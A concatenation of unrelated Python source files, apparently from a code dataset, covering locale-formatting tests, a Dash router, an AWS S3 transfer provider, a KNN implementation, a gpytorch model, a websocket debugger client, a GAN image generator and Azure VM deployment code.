    assert fmt.datetime(datetime(2007, 4, 1, 15, 30)) == 'Apr 1, 2007, 11:30:00 AM'
def test_format_time():
    """Time-only formatting, also converted into US/Eastern."""
    from pytz import timezone
    eastern = timezone('US/Eastern')
    fmt = support.Format('en_US', tzinfo=eastern)
    assert fmt.time(datetime(2007, 4, 1, 15, 30)) == '11:30:00 AM'
def test_format_timedelta():
    """Timedeltas are rendered as an approximate human-readable span."""
    eleven_weeks = timedelta(weeks=11)
    assert support.Format('en_US').timedelta(eleven_weeks) == '3 months'
def test_format_number():
    """Integer formatting applies the locale's thousands separator."""
    assert support.Format('en_US').number(1099) == '1,099'
def test_format_decimal():
    """Decimal formatting rounds to the locale's default precision."""
    assert support.Format('en_US').decimal(1.2345) == '1.234'
def test_format_percent():
    """Percent formatting scales the fraction and appends the sign."""
    assert support.Format('en_US').percent(0.34) == '34%'
def test_lazy_proxy():
    """LazyProxy transparently behaves like the wrapped call's result
    in str(), concatenation, %-formatting and ordering."""
    def greeting(name='world'):
        return u'Hello, %s!' % name

    lazy_greeting = support.LazyProxy(greeting, name='Joe')
    assert str(lazy_greeting) == u"Hello, Joe!"
    assert u' ' + lazy_greeting == u' Hello, Joe!'
    assert u'(%s)' % lazy_greeting == u'(Hello, Joe!)'

    names = ['world', 'Joe', 'universe']
    greetings = [support.LazyProxy(greeting, name) for name in names]
    greetings.sort()
    assert [str(g) for g in greetings] == [
        u"Hello, Joe!",
        u"Hello, universe!",
        u"Hello, world!",
    ]
| StarcoderdataPython |
179318 | from dash.dependencies import Input, Output, State
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
# main dash instance
from app import app
# call modules needed for callbacks
from apps.pages import map, photos, eda, map_overlay, model_results, progressbar, team18
# Entire callbacks definition
def register_callbacks(app):
    """Attach every Dash callback to *app*.

    Currently registers a single router callback mapping the browser URL
    (Input "url".pathname) to the layout of the matching page module,
    rendered into the "page-content" container.
    """
    @app.callback(Output("page-content", "children"), [Input("url", "pathname")])
    def render_page_content(pathname):
        # NOTE(review): the page module is named `map`, shadowing the builtin.
        if pathname in ["/"]:
            return map.layout
        elif pathname == "/photos":
            return photos.layout
        elif pathname == "/eda":
            return eda.layout
        elif pathname == "/results":
            return map_overlay.layout
        elif pathname == "/team18":
            return team18.layout
        # If the user tries to reach a different page, return a 404 message
        return dbc.Jumbotron(
            [
                html.H1("404: Not found", className="text-danger"),
                html.Hr(),
                html.P(f"The pathname {pathname} was not recognised..."),
            ]
        )
| StarcoderdataPython |
1648632 | <filename>cloudmesh/transfer/provider/awss3/Provider.py
from cloudmesh.storage.StorageNewABC import StorageABC
from cloudmesh.common.debug import VERBOSE
from cloudmesh.common.StopWatch import StopWatch
from cloudmesh.common.util import banner
from cloudmesh.common.console import Console
from cloudmesh.configuration.Config import Config
# from cloudmesh.storage.provider.local.Provider import Provider as \
# StorageLocalProvider
from cloudmesh.storage.provider.azureblob.Provider import Provider as \
StorageAzureblobProvider
from cloudmesh.storage.provider.awss3.Provider import Provider as \
StorageAwss3Provider
from pathlib import Path
from pprint import pprint
from cloudmesh.common.Printer import Printer
class Provider(StorageABC):
    """
    Provider class for aws s3 storage.
    This class allows transfer of objects from and to AWS S3 bucket
    Default parameters are read from ~/.cloudmesh/cloudmesh.yaml :
        awss3:
          cm:
            active: false
            heading: homedir
            host: aws.com
            label: home-dir
            kind: awss3
            version: TBD
            service: storage
          default:
            directory: /
          credentials:
            access_key_id: XXX
            secret_access_key: XXX
            bucket: XXX
            region: us-east-2
    """

    def __init__(self, source=None, source_obj=None, target=None,
                 target_obj=None, config="~/.cloudmesh/cloudmesh.yaml"):
        banner(f"""In AWS S3 provider
        source csp = {source}, source object = {source_obj}
        target csp = {target}, target object = {target_obj}""")
        # This is a provider for AWS S3 hence initializing storage's AWS S3
        # provider by default
        self.storage_provider = StorageAwss3Provider(service='awss3')

    @staticmethod
    def print_table(result, status=None, source=None, target=None):
        """Print a flat table of per-object transfer results and return the
        list of row dicts used to build it."""
        op_result = []
        for idx, i in enumerate(result):
            op_dict = dict()
            op_dict['idx'] = idx + 1
            op_dict['source'] = source
            op_dict['name'] = i['fileName']
            op_dict['size'] = i['contentLength']
            op_dict['lastmodified'] = i['lastModificationDate']
            op_dict['type'] = 'File'
            op_dict['status'] = status
            op_dict['target'] = target
            op_result.append(op_dict)
        # pprint(op_result)
        table = Printer.flatwrite(op_result,
                                  sort_keys=["idx"],
                                  order=["idx", "source", "target", "name",
                                         "size", "type", "lastmodified",
                                         "status"],
                                  header=["S.No.", "Source CSP",
                                          "Target CSP", "Name", "Size",
                                          "Type", "Creation", "Status"])
        print(table)
        return op_result

    def list(self, source=None, source_obj=None,
             target=None, target_obj=None,
             recursive=True):
        """
        To enlist content of "target object"
        :param source: source CSP - awss3/azure/local, None for list method
        :param source_obj: It can be file or folder, None for list method
        :param target: target CSP - awss3/azure/local
        :param target_obj: It can be file or folder
        :param recursive: enlist directories/sub-directories
        :return: dictionary enlisting objects
        """
        print("CALLING AWS S3 PROVIDER'S LIST METHOD")
        result = self.storage_provider.list(source=target_obj, recursive=True)
        # pprint(result)
        return self.print_table(result, status='Available', source=source,
                                target=target)

    def delete(self, source=None, source_obj=None,
               target=None, target_obj=None,
               recursive=True):
        """
        To delete content of "target object"
        :param source: source CSP - awss3/azure/local, None for delete method
        :param source_obj: It can be file or folder, None for delete method
        :param target: target CSP - awss3/azure/local
        :param target_obj: It can be file or folder
        :param recursive: enlist directories/sub-directories
        :return: dictionary enlisting deleted objects
        """
        print("CALLING AWS S3 PROVIDER'S DELETE METHOD")
        result = self.storage_provider.delete(source=target_obj, recursive=True)
        # The storage provider returns an empty list when nothing was deleted.
        if len(result) == 0:
            return Console.error(f"Object {target_obj} couldn't be delete from "
                                 f"{target} CSP. Please check.")
        else:
            Console.ok(f"Deleted following objects from {target} CSP:\n ")
            return self.print_table(result, status='Deleted', source=source,
                                    target=target)

    def copy(self, source=None, source_obj=None,
             target=None, target_obj=None,
             recursive=True):
        """
        Copy objects from source to target storage
        :param source: source CSP - awss3/azure/local
        :param source_obj: It can be file or folder
        :param target: target CSP - awss3/azure/local
        :param target_obj: It can be file or folder
        :param recursive: enlist directories/sub-directories
        :return: dictionary enlisting copied objects
        """
        print("CALLING AWS S3 PROVIDER'S GET METHOD FOR AWS S3 TO LOCAL COPY")
        # Default the target name to the source name; normalise both to
        # forward slashes so Windows paths work against the bucket.
        if target_obj is None:
            target_obj = source_obj
        target_obj = target_obj.replace("\\", "/")
        source_obj = source_obj.replace("\\", "/")
        if target == "local":
            # awss3 -> local download.
            result = self.storage_provider.get(source=source_obj,
                                               destination=target_obj,
                                               recursive=recursive)
        elif target == "awss3":
            source_obj = str(Path(source_obj).expanduser()).replace("\\", "/")
            if source == "azure":
                # azure -> awss3 is staged through the configured local
                # directory: fetch the blob locally, then upload it.
                source_provider = StorageAzureblobProvider(service="azure")
                config = Config(config_path="~/.cloudmesh/cloudmesh.yaml")
                spec = config["cloudmesh.storage"]
                local_target = spec["local"]["default"]["directory"]
                local_target = local_target.replace("\\", "/")
                result = source_provider.get(source=source_obj,
                                             destination=local_target,
                                             recursive=recursive)
                print("Fetched from azure blob to local:\n")
                pprint(result)
                # TODO: return error here itself if the source object is not
                # found
                if result is None:
                    return Console.error(f"Object {source_obj} couldn't be "
                                         f"fetched from {source}. Please "
                                         f"check'")
                else:
                    # NOTE(review): stray debug print -- consider removing.
                    print(len(result[0]['name']))
                    # Removing root from the source_obj
                    temp_p = Path(source_obj)
                    source_obj = str(temp_p).replace(temp_p.root, "", 1)
                    source_obj = str(Path(Path(local_target).expanduser() /
                                          source_obj))
                    print(source_obj)
            # Upload from the (possibly just staged) local path to S3.
            result = self.storage_provider.put(source=source_obj,
                                               destination=target_obj,
                                               recursive=recursive)
        else:
            raise NotImplementedError
        if len(result) == 0:
            return Console.error(f"Object {source_obj} couldn't be copied from "
                                 f"{source} to {target}. Please check.")
        else:
            Console.ok(f"Copied {source_obj} from {source} to {target}\nTarget "
                       f"object name is {target_obj} ")
            # pprint(result)
            return self.print_table(result, status='Copied', source=source,
                                    target=target)
#
# if __name__ == "__main__":
# p = Provider(source=None, source_obj=None,
# target="awss3", target_obj="\\")
#
# # p.list(source=None, source_obj=None,
# # target="awss3", target_obj="/folder1")
#
# # p.delete(source=None, source_obj=None,
# # target="awss3", target_obj="/folder1")
#
# # p.copy(source="awss3", source_obj="/folder1",
# # target="local", target_obj="~\\cmStorage",
# # recursive=True)
#
# p.copy(source="local", source_obj="~\\cmStorage\\folder1",
# target="awss3", target_obj="/folder1/",
# recursive=True)
# # TODO : Following command did not create folder1 in AWS S3. Check.
# # p.copy(source="azure", source_obj="\\folder1\\",
# # target="awss3", target_obj="\\",
# # recursive=True)
| StarcoderdataPython |
3268044 | #!/usr/bin/env python3
# K N N A L G O R I T H M
# Project KNN Algorithm Implementation
# Author <NAME>
# Email <EMAIL>
# Date 13.01.2017
# Python 3.5.1
# License MIT
import math
from random import random
from collections import defaultdict
def get_train_test_sets(data, results, train=0.75):
    """Randomly split *data*/*results* into train and test subsets.

    Each sample independently lands in the train set with probability
    *train* (one random() draw per sample); its label follows it.
    """
    x_train, x_test, y_train, y_test = [], [], [], []
    for idx, sample in enumerate(data):
        in_train = random() < train
        (x_train if in_train else x_test).append(sample)
        (y_train if in_train else y_test).append(results[idx])
    return x_train, x_test, y_train, y_test
def gauss(dist, sigma=10.0):
    """Gaussian distance weight: exp(-dist**2 / (2 * sigma**2)).

    Equals 1.0 at dist == 0 and decays symmetrically with |dist|;
    *sigma* controls how quickly far neighbors lose influence.
    (Uses math.exp instead of math.e ** x -- the idiomatic, more
    accurate form.)
    """
    return math.exp(-dist ** 2 / (2 * sigma ** 2))
def inverse(dist):
    """Inverse-distance weight: 1 / (dist + 1); 1.0 at dist == 0."""
    weight = 1 / (dist + 1)
    return weight
def get_distance(vec1: list, vec2: list) -> float:
    """Return the Euclidean distance between two equal-length vectors."""
    squared = sum(pow(a - b, 2) for a, b in zip(vec1, vec2))
    return math.sqrt(squared)
def knn(vec, vectors, k):
    """Return the k nearest neighbors of *vec* among *vectors* as
    (index, distance) pairs, sorted by ascending distance."""
    distances = []
    for idx, other in enumerate(vectors):
        distances.append((idx, get_distance(vec, other)))
    distances.sort(key=lambda pair: pair[1])
    return distances[:k]
def regr_predict(vec, vectors, results, k, weighted=True, weight_func=inverse):
    """Regression prediction: the (optionally distance-weighted) average
    of the k nearest neighbors' result values."""
    total, weights = 0, 0
    for idx, distance in knn(vec, vectors, k):
        weight = weight_func(distance) if weighted else 1
        total += results[idx] * weight
        weights += weight
    # weighted average of the neighbors' results
    return total / weights
def cls_predict(vec, vectors, results, k, weighted=True, weight_func=inverse):
    """Class prediction by k-nearest-neighbor voting.

    Each of the k nearest neighbors votes for its own class; a vote is
    weighted by weight_func(distance) unless *weighted* is False (then
    every vote counts 1).  Returns the class with the highest total vote.
    """
    votes = defaultdict(int)
    for idx, distance in knn(vec, vectors, k):
        votes[results[idx]] += weight_func(distance) if weighted else 1
    # BUG FIX: max(votes) returned the lexicographically largest class
    # label, not the most-voted one; select the key with the largest
    # accumulated vote weight instead.
    return max(votes, key=votes.get)
def regr_error_rate(x_train, y_train, x_test, y_test, k):
    """Return the mean relative regression error on the test set for the
    given *k* (abs(pred - truth) / truth, averaged over y_test)."""
    total_error = 0.0
    for sample, expected in zip(x_test, y_test):
        predicted = regr_predict(sample, x_train, y_train, k)
        total_error += abs(predicted - expected) / expected
    return total_error / len(y_test)
def cls_error_rate(x_train, y_train, x_test, y_test, k):
    """Return the misclassification rate on the test set for the given
    *k* (fraction of test samples whose predicted class differs)."""
    mistakes = sum(
        1
        for sample, expected in zip(x_test, y_test)
        if cls_predict(sample, x_train, y_train, k) != expected
    )
    return mistakes / len(y_test)
def get_best_fit_model(x_train, y_train, x_test, y_test):
    """Return the k (1 <= k < len(y_train)//3) with the lowest error rate
    on the test set; lower k wins ties.  Returns None if no k achieves an
    error rate below 1.0."""
    k_max = int(len(y_train) / 3)
    best_k, best_error = None, 1.0
    # str/bool labels mean classification; numeric labels mean regression.
    if isinstance(y_train[0], (str, bool)):
        error_rate_for = cls_error_rate
    else:
        error_rate_for = regr_error_rate
    # Evaluate every candidate k; strict '<' keeps the smallest best k.
    for k in range(1, k_max):
        error = error_rate_for(x_train, y_train, x_test, y_test, k)
        if error < best_error:
            best_k, best_error = k, error
    return best_k
| StarcoderdataPython |
3296293 | from Backtest import Backtest
from Portfolio import Portfolio | StarcoderdataPython |
10286 | <reponame>phumm/gpytorch
#!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
class ApproximateGP(GP, _PyroMixin):
    """A GP model that computes its posterior through a variational
    strategy rather than exact inference."""

    def __init__(self, variational_strategy):
        # variational_strategy owns the inducing points / variational
        # distribution and is invoked on every forward call.
        super().__init__()
        self.variational_strategy = variational_strategy

    def forward(self, x):
        """
        As in the exact GP setting, the user-defined forward method should return the GP prior mean and covariance
        evaluated at input locations x.
        """
        raise NotImplementedError

    def pyro_guide(self, input, beta=1.0, name_prefix=""):
        r"""
        (For Pyro integration only). The component of a `pyro.guide` that
        corresponds to drawing samples from the latent GP function.

        Args:
            :attr:`input` (:obj:`torch.Tensor`)
                The inputs :math:`\mathbf X`.
            :attr:`beta` (float, default=1.)
                How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
                term by.
            :attr:`name_prefix` (str, default="")
                A name prefix to prepend to pyro sample sites.
        """
        return super().pyro_guide(input, beta=beta, name_prefix=name_prefix)

    def pyro_model(self, input, beta=1.0, name_prefix=""):
        r"""
        (For Pyro integration only). The component of a `pyro.model` that
        corresponds to drawing samples from the latent GP function.

        Args:
            :attr:`input` (:obj:`torch.Tensor`)
                The inputs :math:`\mathbf X`.
            :attr:`beta` (float, default=1.)
                How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
                term by.
            :attr:`name_prefix` (str, default="")
                A name prefix to prepend to pyro sample sites.

        Returns: :obj:`torch.Tensor` samples from :math:`q(\mathbf f)`
        """
        return super().pyro_model(input, beta=beta, name_prefix=name_prefix)

    def __call__(self, inputs, prior=False, **kwargs):
        # Promote 1-d inputs to a column: (n,) -> (n, 1).
        # NOTE(review): extra **kwargs are accepted but silently dropped.
        if inputs.dim() == 1:
            inputs = inputs.unsqueeze(-1)
        return self.variational_strategy(inputs, prior=prior)
| StarcoderdataPython |
142555 | <filename>cmdebug/protocol.py
import socket
import json
import pdb
import simple_http
import urlparse
from chrome_debugger import websocket
def connect(wsurl):
    """Open a WebSocket connection to *wsurl* and return its context dict.

    Builds the HTTP upgrade handshake, sends it over a fresh TCP socket
    (defaulting to localhost:9222 when the URL has no host:port), and
    validates the server's Sec-WebSocket-Accept key; raises ValueError
    and closes the socket on a mismatch.  The returned context carries
    the open socket under "sock" and a request counter under "id".
    """
    context = websocket.gen_handshake(wsurl)
    host = "localhost"
    port = 9222
    netloc = context["components"].netloc
    if ":" in netloc:
        host, port = netloc.split(":")
        port = int(port)
    sock = socket.create_connection((host, port))
    sock.send(context["header"])
    context["response"] = websocket.parse_response(sock.recv(4096))
    # RFC 6455: the server must echo SHA-1(key + magic GUID), base64-encoded.
    if context["response"]["Sec-WebSocket-Accept"] != websocket.gen_response_key(context["key"]):
        sock.close()
        raise ValueError("Incorrected Key")
    context["sock"] = sock
    context["id"] = 0
    return context
def send_text(context, data):
    """Send *data* as one final TEXT frame on the context's socket."""
    frame = websocket.gen_frame(True, websocket.TEXT, data)
    context["sock"].send(frame)
def send_binary(context, data):
    """Send *data* as one final BINARY frame on the context's socket."""
    frame = websocket.gen_frame(True, websocket.BINARY, data)
    context["sock"].send(frame)
def close(context, status, message):
    """Send a CLOSE frame carrying *status* (16-bit, network byte order)
    followed by the *message* bytes.

    Note: this only sends the frame; it does not await the peer's close
    reply or shut the socket down.
    """
    import struct  # local import: struct is not imported at module level

    # BUG FIX: the module name was misspelled `websockeet`, which made
    # every call raise NameError.
    frame = websocket.gen_frame(True, websocket.CLOSE,
                                struct.pack("!H", status) + message)
    context["sock"].send(frame)
def recv(context):
    """Read from the socket until a complete frame sequence is parsed and
    return the parsed frames.

    NOTE(review): if the peer closes the connection, sock.recv returns
    b'' and this loop may spin forever -- confirm websocket.parse_frame
    handles empty input.
    """
    parser = websocket.parse_context.copy()
    while True:
        websocket.parse_frame(parser, context["sock"].recv(4096))
        # parse_frame clears "expect" once no more bytes are needed.
        if not parser["expect"]:
            return parser["frames"]
| StarcoderdataPython |
1680486 | import torch
import torchvision.utils as utils
import io
from PIL import Image
from enum import Enum, auto
from train import loadModel
from generator import DCGenerator, getImage
class GType(Enum):
    """Identifiers for the available pretrained generator checkpoints."""

    CELEBA_30_E = "celeba-30-e"
    CELEBA_20_E = "celeba-20-e"
    CELEBA_10_E = "celeba-10-e"

    @classmethod
    def has_value(cls, value):
        """Return True if *value* equals any member's value."""
        return value in {member.value for member in cls}
class GeneratorManager():
    """Loads the pretrained DCGAN generator checkpoints and produces
    sample-image grids as in-memory PNG buffers."""

    def __init__(self):
        # One generator per training-epoch checkpoint, keyed by the
        # GType member's *string value*.
        self.generators = {
            GType.CELEBA_30_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_30_g", DCGenerator),
            GType.CELEBA_20_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_20_g", DCGenerator),
            GType.CELEBA_10_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_10_g", DCGenerator)
        }

    def generateImage(self, g_type: GType, image_number, label = None):
        """Generate a grid of *image_number* samples with the requested
        generator and return it as a PNG byte buffer.

        NOTE(review): despite the annotation, *g_type* is used directly
        as a dict key, and the dict is keyed by GType values (strings) --
        callers appear to pass the enum's value, not the member; confirm.
        """
        # NOTE(review): duplicated assignment left as-is.
        rand_tensor = rand_tensor = torch.randn(64, 100, 1, 1)
        # if label is not None:
        #     out_tensor = self.generators[g_type](rand_tensor, label).squeeze()
        # else:
        out_tensor = self.generators[g_type](rand_tensor).squeeze()
        return self.__tensorToPNG(image_number, out_tensor)

    def __tensorToPNG(self, image_number, out_tensor):
        # Tile the first image_number samples into one normalized grid,
        # render it with PIL and return the encoded PNG bytes (rewound).
        grid = utils.make_grid(out_tensor[:image_number], padding=2, normalize=True)
        image = Image.fromarray(getImage(grid))
        buffer = io.BytesIO()
        image.save(buffer, 'PNG')
        buffer.seek(0)
        return buffer
3215671 | import sys
import os
sys.path.append(os.path.dirname(__file__) + "/../../")
from hackathon.azureautodeploy.azureUtil import *
from hackathon.database import *
from azure.servicemanagement import *
import datetime
class AzureVirtualMachines:
"""
Azure virtual machines are a collection of deployment and virtual machine on the deployment
Currently the status of deployment in database is only RUNNING,
the status of virtual machine are RUNNING and STOPPED
"""
    def __init__(self, sms, user_template, template_config):
        # sms: the azure ServiceManagementService client used for all
        # management API calls; user_template/template_config describe the
        # resources to create and are used for database bookkeeping.
        self.sms = sms
        self.user_template = user_template
        self.template_config = template_config
    def create_virtual_machines(self):
        """
        Create the deployment and virtual machines described in
        template_config, committing every step to the operation log.

        1. If the deployment does not exist, create the first virtual
           machine together with the deployment.
           Else check whether it was created by this function before.
        2. If the deployment was created by this function before and the
           virtual machine does not exist, add the virtual machine to the
           deployment.
           Else check whether the virtual machine was created by this
           function before.
        :return: True when every machine is running, False on any failure.
        """
        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, START)
        storage_account = self.template_config['storage_account']
        container = self.template_config['container']
        cloud_service = self.template_config['cloud_service']
        deployment = self.template_config['deployment']
        virtual_machines = self.template_config['virtual_machines']
        # The cloud service must already be tracked in the database.
        cs = db_adapter.find_first_object_by(UserResource, type=CLOUD_SERVICE, name=cloud_service['service_name'])
        if cs is None:
            m = '%s %s not running in database now' % (CLOUD_SERVICE, cloud_service['service_name'])
            user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, FAIL, m)
            log.error(m)
            return False
        for virtual_machine in virtual_machines:
            user_operation_commit(self.user_template, CREATE_DEPLOYMENT, START)
            user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, START)
            config = None
            os_hd = None
            vm_image = None
            image = virtual_machine['image']
            system_config = virtual_machine['system_config']
            # 'os' images need an OS configuration plus a fresh VHD blob;
            # otherwise the named VM image is used directly.
            if image['type'] == 'os':
                # check whether virtual machine is Windows or Linux
                if system_config['os_family'] == WINDOWS:
                    config = WindowsConfigurationSet(computer_name=system_config['host_name'],
                                                     admin_password=system_config['user_password'],
                                                     admin_username=system_config['user_name'])
                    config.domain_join = None
                    config.win_rm = None
                else:
                    config = LinuxConfigurationSet(system_config['host_name'],
                                                   system_config['user_name'],
                                                   system_config['user_password'],
                                                   False)
                # Timestamped blob name keeps each VM's OS disk unique.
                now = datetime.datetime.now()
                blob = '%s-%s-%s-%s-%s-%s-%s.vhd' % (image['name'],
                                                     str(now.year), str(now.month), str(now.day),
                                                     str(now.hour), str(now.minute), str(now.second))
                media_link = 'https://%s.%s/%s/%s' % (storage_account['service_name'],
                                                      storage_account['url_base'],
                                                      container,
                                                      blob)
                os_hd = OSVirtualHardDisk(image['name'], media_link)
            else:
                vm_image = image['name']
            network_config = virtual_machine['network_config']
            # remote
            remote = virtual_machine['remote']
            remote_provider = remote['provider']
            remote_protocol = remote['protocol']
            remote_input_endpoint_name = remote['input_endpoint_name']
            # Remote-access (guacamole-style) connection descriptor;
            # vm-image machines use a fixed builtin account.
            gc = {
                'displayname': remote_input_endpoint_name,
                'protocol': remote_protocol,
                "username": system_config['user_name'] if image['type'] == 'os' else 'opentech',
                "password": system_config['user_password'] if image['type'] == 'os' else '<PASSWORD>!'
            }
            # avoid duplicate deployment
            if self.deployment_exists(cloud_service['service_name'], deployment['deployment_slot']):
                if db_adapter.count_by(UserResource,
                                       type=DEPLOYMENT,
                                       name=deployment['deployment_name'],
                                       cloud_service_id=cs.id) == 0:
                    m = '%s %s exist but not created by this function before' % \
                        (DEPLOYMENT, deployment['deployment_name'])
                    user_resource_commit(self.user_template, DEPLOYMENT, deployment['deployment_name'], RUNNING, cs.id)
                else:
                    m = '%s %s exist and created by this function before' % \
                        (DEPLOYMENT, deployment['deployment_name'])
                    user_operation_commit(self.user_template, CREATE_DEPLOYMENT, END, m)
                log.debug(m)
                # avoid duplicate role
                if self.role_exists(cloud_service['service_name'],
                                    deployment['deployment_name'],
                                    virtual_machine['role_name']):
                    if db_adapter.count_by(UserResource,
                                           user_template_id=self.user_template.id,
                                           type=VIRTUAL_MACHINE,
                                           name=virtual_machine['role_name'],
                                           cloud_service_id=cs.id) == 0:
                        m = '%s %s exist but not created by this user template before' % \
                            (VIRTUAL_MACHINE, virtual_machine['role_name'])
                        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
                        log.error(m)
                        return False
                    else:
                        m = '%s %s exist and created by this user template before' % \
                            (VIRTUAL_MACHINE, virtual_machine['role_name'])
                        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END, m)
                        log.debug(m)
                else:
                    # delete old virtual machine info in database, cascade delete old vm endpoint and old vm config
                    db_adapter.delete_all_objects_by(UserResource,
                                                     type=VIRTUAL_MACHINE,
                                                     name=virtual_machine['role_name'],
                                                     cloud_service_id=cs.id)
                    db_adapter.commit()
                    try:
                        result = self.sms.add_role(cloud_service['service_name'],
                                                   deployment['deployment_name'],
                                                   virtual_machine['role_name'],
                                                   config,
                                                   os_hd,
                                                   role_size=virtual_machine['role_size'],
                                                   vm_image_name=vm_image)
                    except Exception as e:
                        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, e.message)
                        log.error(e)
                        return False
                    # make sure async operation succeeds
                    if not wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP):
                        m = WAIT_FOR_ASYNC + ' ' + FAIL
                        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
                        log.error(m)
                        return False
                    # make sure role is ready
                    if not self.wait_for_role(cloud_service['service_name'],
                                              deployment['deployment_name'],
                                              virtual_machine['role_name'],
                                              VIRTUAL_MACHINE_TICK,
                                              VIRTUAL_MACHINE_LOOP):
                        m = '%s %s created but not ready' % (VIRTUAL_MACHINE, virtual_machine['role_name'])
                        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
                        log.error(m)
                        return False
                    else:
                        user_resource_commit(self.user_template,
                                             VIRTUAL_MACHINE,
                                             virtual_machine['role_name'],
                                             RUNNING,
                                             cs.id)
                        self.__vm_info_helper(cs,
                                              cloud_service['service_name'],
                                              deployment['deployment_name'],
                                              virtual_machine['role_name'],
                                              remote_provider,
                                              gc,
                                              network_config)
                    user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END)
            else:
                # delete old deployment
                db_adapter.delete_all_objects_by(UserResource,
                                                 type=DEPLOYMENT,
                                                 name=deployment['deployment_name'],
                                                 cloud_service_id=cs.id)
                # delete old virtual machine info in database, cascade delete old vm endpoint and old vm config
                db_adapter.delete_all_objects_by(UserResource,
                                                 type=VIRTUAL_MACHINE,
                                                 name=virtual_machine['role_name'],
                                                 cloud_service_id=cs.id)
                db_adapter.commit()
                try:
                    result = self.sms.create_virtual_machine_deployment(cloud_service['service_name'],
                                                                        deployment['deployment_name'],
                                                                        deployment['deployment_slot'],
                                                                        virtual_machine['label'],
                                                                        virtual_machine['role_name'],
                                                                        config,
                                                                        os_hd,
                                                                        role_size=virtual_machine['role_size'],
                                                                        vm_image_name=vm_image)
                except Exception as e:
                    user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, e.message)
                    user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, e.message)
                    log.error(e)
                    return False
                # make sure async operation succeeds
                if not wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP):
                    m = WAIT_FOR_ASYNC + ' ' + FAIL
                    user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, m)
                    user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
                    log.error(m)
                    return False
                # make sure deployment is ready
                if not self.__wait_for_deployment(cloud_service['service_name'],
                                                  deployment['deployment_name'],
                                                  DEPLOYMENT_TICK,
                                                  DEPLOYMENT_LOOP):
                    m = '%s %s created but not ready' % (DEPLOYMENT, deployment['deployment_name'])
                    user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, m)
                    log.error(m)
                    return False
                else:
                    user_resource_commit(self.user_template, DEPLOYMENT, deployment['deployment_name'], RUNNING, cs.id)
                    user_operation_commit(self.user_template, CREATE_DEPLOYMENT, END)
                # make sure role is ready
                if not self.wait_for_role(cloud_service['service_name'],
                                          deployment['deployment_name'],
                                          virtual_machine['role_name'],
                                          VIRTUAL_MACHINE_TICK,
                                          VIRTUAL_MACHINE_LOOP):
                    m = '%s %s created but not ready' % (VIRTUAL_MACHINE, virtual_machine['role_name'])
                    user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
                    log.error(m)
                    return False
                else:
                    user_resource_commit(self.user_template,
                                         VIRTUAL_MACHINE,
                                         virtual_machine['role_name'],
                                         RUNNING,
                                         cs.id)
                    self.__vm_info_helper(cs,
                                          cloud_service['service_name'],
                                          deployment['deployment_name'],
                                          virtual_machine['role_name'],
                                          remote_provider,
                                          gc,
                                          network_config)
                    user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END)
        user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, END)
        return True
def deployment_exists(self, service_name, deployment_slot):
    """
    Check whether the given deployment slot of a cloud service holds a deployment.

    Side effect: when the slot exists, the template config's deployment name is
    reset to the name Azure reports for it, so later operations use the real name.

    :param service_name: cloud service that owns the slot
    :param deployment_slot: slot to probe (e.g. production / staging)
    :return: True if a deployment occupies the slot, False otherwise
    """
    try:
        props = self.sms.get_deployment_by_slot(service_name, deployment_slot)
    except Exception as e:
        # 'Not found' just means the slot is empty; any other failure is logged.
        # NOTE(review): e.message is a Python 2 idiom -- confirm interpreter version.
        if e.message != 'Not found (Not Found)':
            log.error('%s %s: %s' % (DEPLOYMENT, deployment_slot, e))
        return False
    # Remember the actual deployment name for subsequent template operations.
    self.template_config[T_DEPLOYMENT]['deployment_name'] = props.name
    return props is not None
def role_exists(self, service_name, deployment_name, role_name):
    """
    Check whether a specific virtual machine (role) exists in a deployment.

    :param service_name: cloud service that owns the deployment
    :param deployment_name: deployment to look in
    :param role_name: virtual machine role name
    :return: True if the role exists, False otherwise
    """
    try:
        props = self.sms.get_role(service_name, deployment_name, role_name)
    except Exception as e:
        # 'Not found' means the role simply does not exist; anything else is logged.
        # NOTE(review): e.message is a Python 2 idiom -- confirm interpreter version.
        if e.message != 'Not found (Not Found)':
            log.error('%s %s: %s' % (VIRTUAL_MACHINE, role_name, e))
        return False
    return props is not None
def wait_for_role(self, service_name, deployment_name, role_instance_name,
                  second_per_loop, loop, status=READY_ROLE):
    """
    Poll a virtual machine role until it reaches the desired status.

    Waits at most ``second_per_loop * loop`` seconds.

    :param service_name: cloud service that owns the deployment
    :param deployment_name: deployment the role belongs to
    :param role_instance_name: role instance to watch
    :param second_per_loop: seconds to sleep between polls
    :param loop: maximum number of polls before giving up
    :param status: target status to wait for
    :return: True once the role reports the target status, False on timeout
    """
    attempts = 0
    deployment = self.sms.get_deployment_by_name(service_name, deployment_name)
    while True:
        if self.__get_role_instance_status(deployment, role_instance_name) == status:
            return True
        log.debug('_wait_for_role [%s] loop count: %d' % (role_instance_name, attempts))
        attempts += 1
        if attempts > loop:
            log.error('Timed out waiting for role instance status.')
            return False
        time.sleep(second_per_loop)
